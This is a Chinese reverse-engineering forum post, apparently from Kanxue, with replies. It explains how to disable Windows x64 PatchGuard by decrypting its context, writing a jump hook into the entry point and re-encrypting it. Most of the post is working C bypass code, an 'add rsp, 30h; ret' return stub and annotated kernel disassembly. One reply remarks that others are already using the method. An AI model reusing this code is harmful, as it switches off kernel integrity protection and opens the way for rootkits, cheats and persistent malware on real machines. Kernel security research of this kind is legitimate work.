首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
6
攻破 Window AMD64 平台的 PatchGuard - 让 PatchGuard Context 失效
发表于: 2018-11-27 22:37 9694

攻破 Window AMD64 平台的 PatchGuard - 让 PatchGuard Context 失效

blindtiger 活跃值
1
2018-11-27 22:37
9694
        前文说到如何找到加密的 PatchGuard Context, 先来看一下 CmpAppendDllSection (window 10 build 10.0.17763.1) 函数 :
从函数内部,很轻易的就可以分析出头部的地址的计算方法, Context + *(LONG*)(Context + 7e8h(各版本不同)), 再来看一下入口函数:
这里可以看到 14034eed 这里请了DR7 寄存器, 让硬件断点失效, 所以调试的时候硬件断点要放在这个地址之前, 再来看一下结尾部分的代码:

函数在结束的时候进入了SdbpCheckDll,
这个函数什么也没做, 就是把栈和寄存器清空了.

       看过很多别出心裁的方法让 PatchGuard  失效, 我使用的方法比较简单, 直接HOOK入口点让代码正常返回, 这里有两种情况, 先看一下版本号小于 17134, 没有开启btc的情况 :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
VOID
NTAPI
SetNewEntryForEncryptedContext(
    __inout PPATCHGUARD_BLOCK PatchGuardBlock,
    __in PVOID PatchGuardContext,
    __in ULONG64 RorKey
)
{
    ULONG64 LastRorKey = 0;
    ULONG RvaOfEntry = 0;
    ULONG64 FieldBuffer[PG_COMPARE_FIELDS_COUNT] = { 0 };
    ULONG FieldIndex = 0;
    ULONG Index = 0;
    PCHAR ControlPc = NULL;
 
    // 这里先取 RVA 的偏移, 8字节对齐, 计算密钥的加密次数
 
    FieldIndex = (PatchGuardBlock->RvaOffsetOfEntry -
        PatchGuardBlock->SizeOfCmpAppendDllSection) / sizeof(ULONG64);
 
    // 复制到缓存中
 
    RtlCopyMemory(
        FieldBuffer,
        (PCHAR)PatchGuardContext + (PatchGuardBlock->RvaOffsetOfEntry & ~7),
        sizeof(FieldBuffer));
 
    // 计算缓存的最后一个密钥
 
    LastRorKey = RorKey;
 
    for (Index = 0;
        Index < FieldIndex;
        Index++) {
        LastRorKey = __ROL64(LastRorKey, Index);
    }
 
    // 解密缓存
 
    for (Index = 0;
        Index < RTL_NUMBER_OF(FieldBuffer);
        Index++) {
        LastRorKey = __ROL64(LastRorKey, FieldIndex + Index);
        FieldBuffer[Index] = FieldBuffer[Index] ^ LastRorKey;
    }
 
    // 计算入口的地址
 
    RvaOfEntry = *(PULONG)((PCHAR)FieldBuffer + (PatchGuardBlock->RvaOffsetOfEntry & 7));
 
    //  计算密钥的加密次数
 
    FieldIndex = (RvaOfEntry - PatchGuardBlock->SizeOfCmpAppendDllSection) / sizeof(ULONG64);
 
    // 复制入口的代码到缓存 这里考虑到对齐 需要最少 24 个字节
 
    RtlCopyMemory(
        FieldBuffer,
        (PCHAR)PatchGuardContext + (RvaOfEntry & ~7),
        sizeof(FieldBuffer));
 
    // 计算缓存的最后一个密钥
 
    LastRorKey = RorKey;
 
    for (Index = 0;
        Index < FieldIndex;
        Index++) {
        LastRorKey = __ROL64(LastRorKey, Index);
    }
 
    // 解密缓存
 
    for (Index = 0;
        Index < RTL_NUMBER_OF(FieldBuffer);
        Index++) {
        LastRorKey = __ROL64(LastRorKey, FieldIndex + Index);
        FieldBuffer[Index] = FieldBuffer[Index] ^ LastRorKey;
    }
 
    // 生成 HOOK 代码 "\xff\x25\x00\x00\x00\x00"
 
    ControlPc = (PCHAR)FieldBuffer + (RvaOfEntry & 7);
 
    BuildJumpCode(
        PatchGuardBlock->_ClearEncryptedContext._ShellCode,
        &ControlPc);
 
    // 重新加密缓存
     
    while (Index--) {
        FieldBuffer[Index] = FieldBuffer[Index] ^ LastRorKey;
        LastRorKey = __ROR64(LastRorKey, FieldIndex + Index);
    }
 
    // 替换掉原始加密数据
     
    RtlCopyMemory(
        (PCHAR)PatchGuardContext + (RvaOfEntry & ~7),
        FieldBuffer,
        sizeof(FieldBuffer));
}

在 17134 版本之后由于 RVA 被加密, 并且无法正常加密 CONTEXT, 所以我采用了另外一种方法去找入口点, 方法类似上文找Context 的方法, 由4个Field 碰撞成功已经可以确认这是一个 PatchGuard 的 Context, 继续用入口点的真实代码去碰撞这段内存, 就可以100% 命中.
下面看代码,
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
VOID
NTAPI
SetNewEntryForEncryptedWithBtcContext(
    __inout PPATCHGUARD_BLOCK PatchGuardBlock,
    __in PVOID PatchGuardContext,
    __in SIZE_T ContextSize
)
{
    ULONG64 RorKey = 0;
    ULONG64 LastRorKey = 0;
    ULONG LastRorKeyOffset = 0;
    ULONG64 FieldBuffer[PG_COMPARE_FIELDS_COUNT] = { 0 };
    ULONG FieldIndex = 0;
    ULONG AlignOffset = 0;
    ULONG Index = 0;
    PULONG64 ControlPc = NULL;
    PULONG64 TargetPc = NULL;
    ULONG CompareCount = 0;
 
    // 由于头部的第一个字节可能不对齐 所以我们最多可能需要循环 7 次
 
    CompareCount = (ContextSize - PatchGuardBlock->SizeOfCmpAppendDllSection) / 8 - 1;
 
    for (AlignOffset = 0;
        AlignOffset < 8;
        AlignOffset++) {
        ControlPc = (PULONG64)((PCHAR)PatchGuardBlock->EntryPoint + AlignOffset);
        TargetPc = (PULONG64)((PCHAR)PatchGuardContext + PatchGuardBlock->SizeOfCmpAppendDllSection);
 
        for (Index = 0;
            Index < CompareCount;
            Index++) {
            RorKey = TargetPc[Index + 1] ^ ControlPc[1];
            LastRorKey = RorKey;
            RorKey = __ROR64(RorKey, Index + 1);
            RorKey = _btc64(RorKey, RorKey);
 
            if ((TargetPc[Index] ^ RorKey) == ControlPc[0]) {
                // 命中数据
 
                goto found;
            }
        }
    }
 
found:
    // 判断没有没命中 当然这几乎不太可能发生
     
    if (Index != CompareCount) {
        // 计算对齐点
     
        FieldIndex = Index - (0 == (AlignOffset & 7) ? 0 : 1);
        LastRorKeyOffset = 2 + (0 == (AlignOffset & 7) ? 0 : 1);
 
        // 复制代码到缓存
     
        RtlCopyMemory(
            FieldBuffer,
            (PCHAR)PatchGuardContext + PatchGuardBlock->SizeOfCmpAppendDllSection + FieldIndex * 8,
            sizeof(FieldBuffer));
 
        // 解密缓存代码
     
        RorKey = LastRorKey;
        Index = LastRorKeyOffset;
 
        while (Index--) {
            FieldBuffer[Index] = FieldBuffer[Index] ^ RorKey;
            RorKey = __ROR64(RorKey, FieldIndex + Index);
            RorKey = _btc64(RorKey, RorKey);
        }
 
        // 生成 HOOK 代码
     
        ControlPc = (PCHAR)FieldBuffer + 8 - AlignOffset;
 
        BuildJumpCode(
            PatchGuardBlock->_ClearEncryptedContext._ShellCode,
            &ControlPc);
 
        // 重新加密代码
     
        RorKey = LastRorKey;
        Index = LastRorKeyOffset;
 
        while (Index--) {
            FieldBuffer[Index] = FieldBuffer[Index] ^ RorKey;
            RorKey = __ROR64(RorKey, FieldIndex + Index);
            RorKey = _btc64(RorKey, RorKey);
        }
 
        // 写回去
     
        RtlCopyMemory(
            (PCHAR)PatchGuardContext + PatchGuardBlock->SizeOfCmpAppendDllSection + FieldIndex * 8,
            FieldBuffer,
            sizeof(FieldBuffer));
    }
}

        再来看一下HOOK后的操作 :
1
2
        add rsp, 30h
        ret

        讲下这里 为啥是 30h, 入口是从CmpAppendDllSection 进入的 入口代码是 :
1
2
        sub rsp, 28h
        call rax

      28h + call 压入的ret 地址 刚好是30h 这样就返回了上层调用函数, 因为PatchGuard 实际上什么也没干所以直接就可以返回了, 到这里加密 Context 部分的操作要点基本就说完了, 当 Context 已经解密并且已经在执行的时候应该怎么办, 这个留到下节再说. 最后我在贴一个DPC 触发异常进入CmpAppendDllSection 的代码, 当然只是10种解密中的一个, 有兴趣可以调试看看:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
.text:00000001401CA89A                                                 ExpCenturyDpcRoutine$fin$0:             ; DATA XREF: .rdata:00000001403D09AC↓o
.text:00000001401CA89A                                                                                         ; .pdata:000000014047B220↓o
.text:00000001401CA89A                                                 ;   __finally // owned by 14015AABE
.text:00000001401CA89A 40 53                                                           push    rbx
.text:00000001401CA89C 55                                                              push    rbp
.text:00000001401CA89D 48 83 EC 38                                                     sub     rsp, 38h
.text:00000001401CA8A1 48 8B EA                                                        mov     rbp, rdx
.text:00000001401CA8A4 88 4D 50                                                        mov     [rbp+50h], cl
.text:00000001401CA8A7 84 C9                                                           test    cl, cl
.text:00000001401CA8A9 0F 84 0E 02 00 00                                               jz      loc_1401CAABD
.text:00000001401CA8AF E9 36 01 00 00                                                  jmp     loc_1401CA9EA
.text:00000001401CA8B4                                                 ; ---------------------------------------------------------------------------
.text:00000001401CA8B4
.text:00000001401CA8B4                                                 loc_1401CA8B4:                          ; CODE XREF: ExpCenturyDpcRoutine+7004C↓j
.text:00000001401CA8B4 45 33 D2                                                        xor     r10d, r10d
.text:00000001401CA8B7 44 89 55 54                                                     mov     [rbp+54h], r10d
.text:00000001401CA8BB 48 8B 5D 38                                                     mov     rbx, [rbp+38h]
.text:00000001401CA8BF
.text:00000001401CA8BF                                                 loc_1401CA8BF:                          ; CODE XREF: ExpCenturyDpcRoutine+6FF1F↓j
.text:00000001401CA8BF 4D 8B 01                                                        mov     r8, [r9]
.text:00000001401CA8C2 4C 89 85 18 01 00 00                                            mov     [rbp+118h], r8
.text:00000001401CA8C9 49 8B D0                                                        mov     rdx, r8
.text:00000001401CA8CC 48 8B 05 95 AD 2F 00                                            mov     rax, cs:KiWaitNever
.text:00000001401CA8D3 48 33 D0                                                        xor     rdx, rax
.text:00000001401CA8D6 8B C8                                                           mov     ecx, eax
.text:00000001401CA8D8 48 D3 C2                                                        rol     rdx, cl
.text:00000001401CA8DB 48 33 D3                                                        xor     rdx, rbx
.text:00000001401CA8DE 48 0F CA                                                        bswap   rdx
.text:00000001401CA8E1 48 33 15 80 AF 2F 00                                            xor     rdx, cs:KiWaitAlways
.text:00000001401CA8E8 49 89 11                                                        mov     [r9], rdx
.text:00000001401CA8EB 41 8B C2                                                        mov     eax, r10d
.text:00000001401CA8EE 49 0F AF C3                                                     imul    rax, r11
.text:00000001401CA8F2 48 03 C2                                                        add     rax, rdx
.text:00000001401CA8F5 49 89 01                                                        mov     [r9], rax
.text:00000001401CA8F8 41 8B C8                                                        mov     ecx, r8d
.text:00000001401CA8FB F7 D1                                                           not     ecx
.text:00000001401CA8FD 83 E1 3F                                                        and     ecx, 3Fh
.text:00000001401CA900 B8 C8 00 00 00                                                  mov     eax, 0C8h
.text:00000001401CA905 41 2B C2                                                        sub     eax, r10d
.text:00000001401CA908 41 0F AF C2                                                     imul    eax, r10d
.text:00000001401CA90C 48 D3 C8                                                        ror     rax, cl
.text:00000001401CA90F 48 33 D8                                                        xor     rbx, rax
.text:00000001401CA912 48 89 5D 38                                                     mov     [rbp+38h], rbx
.text:00000001401CA916 41 83 E0 3F                                                     and     r8d, 3Fh
.text:00000001401CA91A 41 8A C8                                                        mov     cl, r8b
.text:00000001401CA91D 48 D3 C3                                                        rol     rbx, cl
.text:00000001401CA920 48 89 5D 38                                                     mov     [rbp+38h], rbx
.text:00000001401CA924 49 03 DB                                                        add     rbx, r11
.text:00000001401CA927 48 89 5D 38                                                     mov     [rbp+38h], rbx
.text:00000001401CA92B 45 33 C0                                                        xor     r8d, r8d
.text:00000001401CA92E 44 89 45 58                                                     mov     [rbp+58h], r8d
.text:00000001401CA932
.text:00000001401CA932                                                 loc_1401CA932:                          ; CODE XREF: ExpCenturyDpcRoutine+6FF0A↓j
.text:00000001401CA932 41 0F B6 01                                                     movzx   eax, byte ptr [r9]
.text:00000001401CA936 83 E0 0F                                                        and     eax, 0Fh
.text:00000001401CA939 0F B6 54 05 40                                                  movzx   edx, byte ptr [rbp+rax+40h]
.text:00000001401CA93E 49 83 21 F0                                                     and     qword ptr [r9], 0FFFFFFFFFFFFFFF0h
.text:00000001401CA942 49 0B 11                                                        or      rdx, [r9]
.text:00000001401CA945 49 89 11                                                        mov     [r9], rdx
.text:00000001401CA948 48 C1 CA 04                                                     ror     rdx, 4
.text:00000001401CA94C 49 89 11                                                        mov     [r9], rdx
.text:00000001401CA94F 41 FF C0                                                        inc     r8d
.text:00000001401CA952 44 89 45 58                                                     mov     [rbp+58h], r8d
.text:00000001401CA956 41 83 F8 10                                                     cmp     r8d, 10h
.text:00000001401CA95A 72 D6                                                           jb      short loc_1401CA932
.text:00000001401CA95C 49 83 C1 08                                                     add     r9, 8
.text:00000001401CA960 4C 89 4D 60                                                     mov     [rbp+60h], r9
.text:00000001401CA964 41 FF C2                                                        inc     r10d
.text:00000001401CA967 44 89 55 54                                                     mov     [rbp+54h], r10d
.text:00000001401CA96B 41 83 FA 19                                                     cmp     r10d, 19h
.text:00000001401CA96F 0F 82 4A FF FF FF                                               jb      loc_1401CA8BF
.text:00000001401CA975 48 B9 F5 6F 1B AD 5F 93 44 62                                   mov     rcx, 6244935FAD1B6FF5h
.text:00000001401CA97F 49 8B 03                                                        mov     rax, [r11]
.text:00000001401CA982 48 33 C1                                                        xor     rax, rcx
.text:00000001401CA985 48 89 45 38                                                     mov     [rbp+38h], rax
.text:00000001401CA989 48 8B 45 38                                                     mov     rax, [rbp+38h]
.text:00000001401CA98D 48 B9 DB 27 2A BC 17 A2 15 6A                                   mov     rcx, 6A15A217BC2A27DBh
.text:00000001401CA997 48 33 C1                                                        xor     rax, rcx
.text:00000001401CA99A 48 89 45 38                                                     mov     [rbp+38h], rax
.text:00000001401CA99E 41 C6 03 2E                                                     mov     byte ptr [r11], 2Eh     ; 写入 CmpAppendDllSection 头部4字节解密数据
.text:00000001401CA9A2 41 C6 43 01 48                                                  mov     byte ptr [r11+1], 48h
.text:00000001401CA9A7 41 C6 43 02 31                                                  mov     byte ptr [r11+2], 31h
.text:00000001401CA9AC 41 C6 43 03 11                                                  mov     byte ptr [r11+3], 11h
.text:00000001401CA9B1 45 33 C9                                                        xor     r9d, r9d
.text:00000001401CA9B4 45 33 C0                                                        xor     r8d, r8d
.text:00000001401CA9B7 48 8B 55 38                                                     mov     rdx, [rbp+38h]
.text:00000001401CA9BB 49 8B CB                                                        mov     rcx, r11
.text:00000001401CA9BE 49 8B C3                                                        mov     rax, r11
.text:00000001401CA9C1 E8 4A ED FE FF                                                  call    _guard_dispatch_icall ;这里进入 CmpAppendDllSection
.text:00000001401CA9C6 C7 45 5C 01 00 00 00                                            mov     dword ptr [rbp+5Ch], 1
.text:00000001401CA9CD 8B 45 30                                                        mov     eax, [rbp+30h]
.text:00000001401CA9D0 83 C0 02                                                        add     eax, 2
.text:00000001401CA9D3 89 45 30                                                        mov     [rbp+30h], eax
.text:00000001401CA9D6 48 8D 15 FD 00 F9 FF                                            lea     rdx, loc_14015AADA
.text:00000001401CA9DD 48 8B 8D 38 01 00 00                                            mov     rcx, [rbp+138h]
.text:00000001401CA9E4 E8 77 42 FC FF                                                  call    _local_unwind
.text:00000001401CA9E9 90                                                              nop
.text:00000001401CA9EA
.text:00000001401CA9EA                                                 loc_1401CA9EA:                          ; CODE XREF: ExpCenturyDpcRoutine+6FE5F↑j
.text:00000001401CA9EA 8B 45 30                                                        mov     eax, [rbp+30h]
.text:00000001401CA9ED 83 F8 02                                                        cmp     eax, 2
.text:00000001401CA9F0 0F 85 AB 00 00 00                                               jnz     loc_1401CAAA1
.text:00000001401CA9F6 48 8B 8D CA 00 00 00                                            mov     rcx, [rbp+0CAh]
.text:00000001401CA9FD 48 89 8D E8 00 00 00                                            mov     [rbp+0E8h], rcx
.text:00000001401CAA04 4C 8B 85 C2 00 00 00                                            mov     r8, [rbp+0C2h]
.text:00000001401CAA0B 48 8B 85 CA 00 00 00                                            mov     rax, [rbp+0CAh]
.text:00000001401CAA12 48 89 85 00 01 00 00                                            mov     [rbp+100h], rax
.text:00000001401CAA19 48 8B 55 7A                                                     mov     rdx, [rbp+7Ah]
.text:00000001401CAA1D 49 D3 C8                                                        ror     r8, cl
.text:00000001401CAA20 8B C8                                                           mov     ecx, eax
.text:00000001401CAA22 48 D3 C2                                                        rol     rdx, cl
.text:00000001401CAA25 4C 8B 5A 40                                                     mov     r11, [rdx+40h]
.text:00000001401CAA29 4C 89 5D 38                                                     mov     [rbp+38h], r11
.text:00000001401CAA2D 4D 33 D8                                                        xor     r11, r8
.text:00000001401CAA30 48 B8 00 00 00 00 00 80 FF FF                                   mov     rax, 0FFFF800000000000h
.text:00000001401CAA3A 4C 0B D8                                                        or      r11, rax
.text:00000001401CAA3D 4C 89 9D 10 01 00 00                                            mov     [rbp+110h], r11
.text:00000001401CAA44 4D 8B CB                                                        mov     r9, r11
.text:00000001401CAA47 4C 89 5D 60                                                     mov     [rbp+60h], r11
.text:00000001401CAA4B 41 8B CB                                                        mov     ecx, r11d
.text:00000001401CAA4E 83 E1 3F                                                        and     ecx, 3Fh
.text:00000001401CAA51 49 8B C3                                                        mov     rax, r11
.text:00000001401CAA54 48 D3 C8                                                        ror     rax, cl
.text:00000001401CAA57 48 89 45 38                                                     mov     [rbp+38h], rax
.text:00000001401CAA5B C7 45 40 09 0A 0C 01                                            mov     dword ptr [rbp+40h], 10C0A09h
.text:00000001401CAA62 C7 45 44 0F 00 05 0E                                            mov     dword ptr [rbp+44h], 0E05000Fh
.text:00000001401CAA69 C7 45 48 04 03 07 0D                                            mov     dword ptr [rbp+48h], 0D070304h
.text:00000001401CAA70 C7 45 4C 08 06 02 0B                                            mov     dword ptr [rbp+4Ch], 0B020608h
.text:00000001401CAA77 33 D2                                                           xor     edx, edx
.text:00000001401CAA79 89 55 54                                                        mov     [rbp+54h], edx
.text:00000001401CAA7C 8B C2                                                           mov     eax, edx
.text:00000001401CAA7E 4C 8D 45 40                                                     lea     r8, [rbp+40h]
.text:00000001401CAA82 4C 03 C0                                                        add     r8, rax
.text:00000001401CAA85
.text:00000001401CAA85                                                 loc_1401CAA85:                          ; CODE XREF: ExpCenturyDpcRoutine+7004A↓j
.text:00000001401CAA85 41 8A 08                                                        mov     cl, [r8]
.text:00000001401CAA88 83 F1 09                                                        xor     ecx, 9
.text:00000001401CAA8B 88 4C 15 40                                                     mov     [rbp+rdx+40h], cl
.text:00000001401CAA8F FF C2                                                           inc     edx
.text:00000001401CAA91 89 55 54                                                        mov     [rbp+54h], edx
.text:00000001401CAA94 49 FF C0                                                        inc     r8
.text:00000001401CAA97 83 FA 10                                                        cmp     edx, 10h
.text:00000001401CAA9A 72 E9                                                           jb      short loc_1401CAA85
.text:00000001401CAA9C E9 13 FE FF FF                                                  jmp     loc_1401CA8B4
.text:00000001401CAAA1                                                 ; ---------------------------------------------------------------------------
.text:00000001401CAAA1
.text:00000001401CAAA1                                                 loc_1401CAAA1:                          ; CODE XREF: ExpCenturyDpcRoutine+6FFA0↑j
.text:00000001401CAAA1 48 8B 85 CA 00 00 00                                            mov     rax, [rbp+0CAh]
.text:00000001401CAAA8 48 89 85 40 01 00 00                                            mov     [rbp+140h], rax
.text:00000001401CAAAF 48 8B 95 C2 00 00 00                                            mov     rdx, [rbp+0C2h]
.text:00000001401CAAB6 8B C8                                                           mov     ecx, eax
.text:00000001401CAAB8 48 D3 CA                                                        ror     rdx, cl
.text:00000001401CAABB 8B 02                                                           mov     eax, [rdx]
.text:00000001401CAABD
.text:00000001401CAABD                                                 loc_1401CAABD:                          ; CODE XREF: ExpCenturyDpcRoutine+6FE59↑j
.text:00000001401CAABD 48 83 C4 38                                                     add     rsp, 38h
.text:00000001401CAAC1 5D                                                              pop     rbp
.text:00000001401CAAC2 5B                                                              pop     rbx
.text:00000001401CAAC3 C3                                                              retn

源码 :Shark

[注意]看雪招聘,专注安全领域的专业人才平台!

收藏
免费 6
支持
分享
赞赏记录
参与人
雪币
留言
时间
dx苹果的心愿
为你点赞~
2022-1-7 18:13
qsls9
为你点赞~
2019-1-22 21:41
Foodie
为你点赞~
2018-11-28 09:39
Editor
为你点赞~
2018-11-28 09:34
万剑归宗
为你点赞~
2018-11-28 08:42
sxpp
为你点赞~
2018-11-28 00:24
最新回复 (30)
はつゆき
雪    币: 1641
活跃值: (3601)
能力值: (RANK:15 )
在线值:
发帖
回帖
粉丝
私信
2
沙发
最后于 2018-11-27 22:43 被はつゆき编辑 ,原因:
2018-11-27 22:42
1
blindtiger
雪    币: 5734
活跃值: (1737)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
3
补充一下, 因为 Context 是接力式触发, 所以打断之后就不会有下文了.
2018-11-27 22:44
1
FANTASYING
雪    币: 2235
活跃值: (1120)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
4
飞哥牛批
2018-11-27 23:10
1
Foodie
雪    币: 4491
活跃值: (2494)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
学习
2018-11-27 23:10
1
qdjytony
雪    币: 668
活跃值: (1071)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
顶飞哥.
2018-11-27 23:22
1
二娃
雪    币: 6313
活跃值: (1117)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
7
飞总牛逼
2018-11-27 23:24
1
sxpp
雪    币: 231
活跃值: (2631)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
私信
8
飞总牛逼
2018-11-28 00:24
1
HlccFu
雪    币: 7121
活跃值: (125793)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
流弊
感谢楼主分享
2018-11-28 08:30
1
万剑归宗
雪    币: 914
活跃值: (2678)
能力值: ( LV5,RANK:68 )
在线值:
发帖
回帖
粉丝
私信
10
2018-11-28 08:42
1
joker陈
雪    币: 11491
活跃值: (3430)
能力值: ( LV5,RANK:71 )
在线值:
发帖
回帖
粉丝
私信
11
飞总牛逼
2018-11-28 09:21
1
hzqst
雪    币: 12876
活跃值: (9332)
能力值: ( LV9,RANK:280 )
在线值:
发帖
回帖
粉丝
私信
12
一大群某地科学家大手子正在路上。。。
(ps:据最新消息已经有大手子用上了)
2018-11-28 11:10
2
Tennn
雪    币: 1176
活跃值: (1284)
能力值: ( LV12,RANK:380 )
在线值:
发帖
回帖
粉丝
私信
13
支持一个。现在天天加班周末也加。都没业余时间搞了驱动玩了 
2018-11-28 11:40
0
luskyc
雪    币: 248
活跃值: (3789)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
14
CmpAppendDllSection直接返回就不用计算入口了,可行?
2018-11-30 02:02
0
hzqst
雪    币: 12876
活跃值: (9332)
能力值: ( LV9,RANK:280 )
在线值:
发帖
回帖
粉丝
私信
15
yy虫子yy CmpAppendDllSection直接返回就不用计算入口了,可行?
前面说了,CmpAppendDllSection本身双加密了,暴力搜索搜不到的
2018-11-30 10:41
0
wowocock
雪    币: 405
活跃值: (2700)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
16
你们再这样下去估计微软要在VT 中使用EPT来保护他的PATCHGUARD代码了。
2018-11-30 11:09
0
hzqst
雪    币: 12876
活跃值: (9332)
能力值: ( LV9,RANK:280 )
在线值:
发帖
回帖
粉丝
私信
17
wowocock 你们再这样下去估计微软要在VT 中使用EPT来保护他的PATCHGUARD代码了。
DeviceGuard了解一下
2018-11-30 14:56
0
小光前辈
雪    币: 1234
活跃值: (1560)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
18
流弊
感谢楼主分享
2018-12-4 20:50
0
黑洛
雪    币: 6129
活跃值: (4941)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
私信
19
hzqst 一大群某地科学家大手子正在路上。。。 (ps:据最新消息已经有大手子用上了)
不止某地,拆迁6也有人用上了。 
2019-1-19 01:45
0
如斯咩咩咩
雪    币: 4709
活跃值: (1675)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
私信
20
飞哥牛逼
2019-1-19 03:59
0
JACK李冰
雪    币: 1454
活跃值: (84)
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
私信
21
又可以抄代码了
2019-1-20 14:29
0
小乔xiaoqiao
雪    币: 50
活跃值: (216)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
22
我在win8.1 9600.17415上面,用楼主的方法搜到了上下文,+0xc8处的函数指针数组也对的上,可是按照偏移计算出来的入口点处的指令和PatchGuardEntryPoint匹配不上。甚至解密整个上下文后,去搜索PatchGuardEntryPoint头部指令都搜索不到。有人遇到过类似的情况吗
2019-3-14 14:04
0
blindtiger
雪    币: 5734
活跃值: (1737)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
23
小乔xiaoqiao 我在win8.1 9600.17415上面,用楼主的方法搜到了上下文,+0xc8处的函数指针数组也对的上,可是按照偏移计算出来的入口点处的指令和PatchGuardEntryPoint匹配不上。甚至解 ...
如果是乱码 看看是不是ror的计算次数搞错了 另外PatchGuardEntryPoint 这段搜索代码 是从ntos文件中获取的
2019-3-14 14:09
0
小乔xiaoqiao
雪    币: 50
活跃值: (216)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
24
小艾 如果是乱码 看看是不是ror的计算次数搞错了 另外PatchGuardEntryPoint 这段搜索代码 是从ntos文件中获取的
win8.1 9600.17415上面,PatchGuardEntryPoint相对于上下文的RVA是存在上下文+0x420处,在0x424和0x428处还存了RtlLookupFunctionEntryEx和FsRtlUninitializeSmallMcb相对于上下文的RVA。我每次解密上下文,这三处的值都是固定不变的,这说明我的ROR计算次数应该没问题。PatchGuardEntryPoint的头部指令也是从ntos中重新提取的。
2019-3-14 14:27
0
blindtiger
雪    币: 5734
活跃值: (1737)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
25
小乔xiaoqiao win8.1 9600.17415上面,PatchGuardEntryPoint相对于上下文的RVA是存在上下文+0x420处,在0x424和0x428处还存了RtlLookupFunctionEnt ...
这就不太清楚了 根据RVA算下地址看看 会不会是已经被修改了
2019-3-14 14:32
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》